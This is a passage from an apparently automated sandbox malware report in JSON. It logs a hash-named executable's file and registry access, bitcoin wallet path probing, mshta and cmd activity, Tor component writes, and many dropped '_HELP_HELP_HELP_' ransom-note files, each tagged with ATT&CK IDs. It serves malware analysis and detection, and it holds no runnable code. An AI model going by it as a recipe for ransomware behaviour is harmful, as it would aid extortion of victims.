\"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\bitcoin\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\bitcoin\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\users\\%OSUSER%\\appdata\\roaming\\bitcoin\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\users\\%OSUSER%\\appdata\\roaming\\bitcoin\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\all control panel items.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\appearance and personalization.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\database1.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\display.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\downloads.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\recent\\hardware and sound.lnk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes a file \"%APPDATA%\\Microsoft\\Speech\\Files\\UserLexicons\\SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" connecting to \"\\ThemeApiPort\"\n \"mshta.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SQMSERVICELIST\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched file \"C:\\Windows\\System32\\en\\mshta.exe.mui\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched file \"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_E9PL_.hta\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched file \"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_PM6VQ_.png\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\733c94c5\\4f98.tmp\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\733c94c5\\cebb.tmp\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"c:\\torservice\\tor\\pluggable_transports\\pt_config.json\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"c:\\torservice\\tor\\pluggable_transports\\readme.snowflake.md\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-203", "type": 6, "relevance": 3, "name": "Tries to access LNK files (Windows shortcut)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\All Control Panel Items.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Appearance and Personalization.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Database1.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Display.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Downloads.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Hardware and Sound.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Network and Internet.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Programs.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pythonLibrary.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\slowfuzzer.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\System and Security.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VxFuzzer.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Win7-KB3191566-x86.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Win7-KB3191566-x86.msu.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\All Control Panel Items.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Appearance and Personalization.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Database1.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\desktop.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Display.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Downloads.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Hardware and Sound.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Network and Internet.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\Programs.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access LNK file \"%APPDATA%\\Microsoft\\Windows\\Recent\\pythonLibrary.lnk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SQMSERVICELIST\"; Key: \"SQMSERVICELIST\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.HTA\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\"; Key: \"DOCOBJECT\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\"; Key: \"BROWSEINPLACE\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.HTA\"; Key: \"CONTENT TYPE\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\\CLSID\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\"; Key: \"ISSHORTCUT\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\"; Key: \"ALWAYSSHOWEXT\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\"; Key: \"NEVERSHOWEXT\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\KINDMAP\"; Key: \".HTA\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTAFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"DELEGATEEXECUTE\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FILEASSOCIATION\"; Key: \"ALLOWEDRESERVEDCHARACTERS\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ADE\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ADP\"; Key: \"\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ASP\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"mshta.exe\" touched file \"C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\taskkill.exe\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\PING.EXE\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"_HELP_HELP_HELP_QNTKK6_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%USERPROFILE%\\Desktop\\_HELP_HELP_HELP_QNTKK6_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_BRYBO0X_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%APPDATA%\\Microsoft\\Outlook\\_HELP_HELP_HELP_BRYBO0X_.png]- [targetUID: 00000000-00003064]\n \"Database1.accdb\" has type \"Microsoft Access Database\"- Location: [%USERPROFILE%\\Documents\\Database1.accdb]- [targetUID: 00000000-00003064]\n \"Outlook.pst\" has type \"Microsoft Outlook email folder (>=2003)\"- Location: [%USERPROFILE%\\Documents\\Outlook Files\\Outlook.pst]- [targetUID: 00000000-00003064]\n \"winword.exe_Rules.xml\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml]- [targetUID: 00000000-00003064]\n \"Tar450D.tmp\" has type \"data\"- [targetUID: N/A]\n \"Cab450C.tmp\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 71954 bytes 1 file at 0x2c +A \"authroot.stl\" number 1 6 datablocks 0x1 compression\"- [targetUID: N/A]\n \"BB605BDF18269B069166BD32B8E46254\" has type \"data\"- [targetUID: N/A]\n \"officeclicktorun.exe_Rules.xml\" has type \"data\"- Location: [%WINDIR%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml]- [targetUID: 00000000-00003064]\n \"officeclicktorun.exe_Rules.xml\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml]- [targetUID: 00000000-00003064]\n \"officec2rclient.exe_Rules.xml\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml]- [targetUID: 00000000-00003064]\n \"setup32.exe_Rules.xml\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml]- [targetUID: 00000000-00003064]\n \"Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt\" has type \"data\"- Location: [%USERPROFILE%\\Documents\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt]- [targetUID: 00000000-00003064]\n \"README.SNOWFLAKE.md\" has type \"data\"- Location: [C:\\TorService\\tor\\pluggable_transports\\README.SNOWFLAKE.md]- [targetUID: 00000000-00003064]\n \"pt_config.json\" has type \"data\"- Location: [C:\\TorService\\tor\\pluggable_transports\\pt_config.json]- [targetUID: 00000000-00003064]\n \"Outlook.srs\" has type \"Composite Document File V2 Document Can't read directory\"- Location: [%APPDATA%\\Microsoft\\Outlook\\Outlook.srs]- [targetUID: 00000000-00003064]\n \"8B2B9A00839EED1DFDCCC3BFC2F5DF12\" has type \"data\"- [targetUID: N/A]\n \"439F613B3D55693954E1B080DE3085B4_13A9E648A032C61467BDA0380F67EA43\" has type \"data\"- [targetUID: N/A]\n \"94929790B3119AF4B3F5D66C747B122B_9465A7928B7B24EA2AE9A56507C9D52A\" has type \"data\"- [targetUID: N/A]\n \"581998720255AB96BEC857C21F96064C\" has type \"data\"- [targetUID: N/A]\n \"SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat\" has type \"data\"- Location: [%APPDATA%\\Microsoft\\Speech\\Files\\UserLexicons\\SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat]- [targetUID: 00000000-00003064]\n \"B46811C17859FFB409CF0E904A4AA8F8\" has type \"data\"- [targetUID: N/A]\n \"4f98.tmp\" has type \"ASCII text with very long lines (344) with no line terminators\"- Location: [%TEMP%\\733c94c5\\4f98.tmp]- [targetUID: 00000000-00003064]\n \"77EC63BDA74BD0D0E0426DC8F8008506\" has type \"data\"- [targetUID: N/A]\n \"cebb.tmp\" has type \"b.out overlay pure segmented standalone object file V2.3 V3.0 Large Text\"- Location: [%TEMP%\\733c94c5\\cebb.tmp]- [targetUID: 00000000-00003064]\n \"tmpBDC4.bmp\" has type \"PC bitmap Windows 3.x format 1280 x 1024 x 32 image size 5242880 cbSize 5242934 bits offset 54\"- Location: [%TEMP%\\tmpBDC4.bmp]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_UTIVO_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [C:\\TorService\\tor\\pluggable_transports\\_HELP_HELP_HELP_UTIVO_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_E9PL_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%WINDIR%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_E9PL_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_K7FG_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_K7FG_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_81QUAPV_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%USERPROFILE%\\Documents\\Outlook Files\\_HELP_HELP_HELP_81QUAPV_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_7RY6X_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%USERPROFILE%\\Documents\\_HELP_HELP_HELP_7RY6X_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_RASBJ_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Outlook\\_HELP_HELP_HELP_RASBJ_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_2TUQAJ6_.hta\" has type \"HTML document Unicode text UTF-8 text with very long lines (947) with CRLF line terminators\"- Location: [%USERPROFILE%\\Documents\\Amazon Downloader Logs\\_HELP_HELP_HELP_2TUQAJ6_.hta]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_PM6VQ_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%WINDIR%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_PM6VQ_.png]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_EFSR87_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%USERPROFILE%\\Desktop\\_HELP_HELP_HELP_EFSR87_.png]- [targetUID: 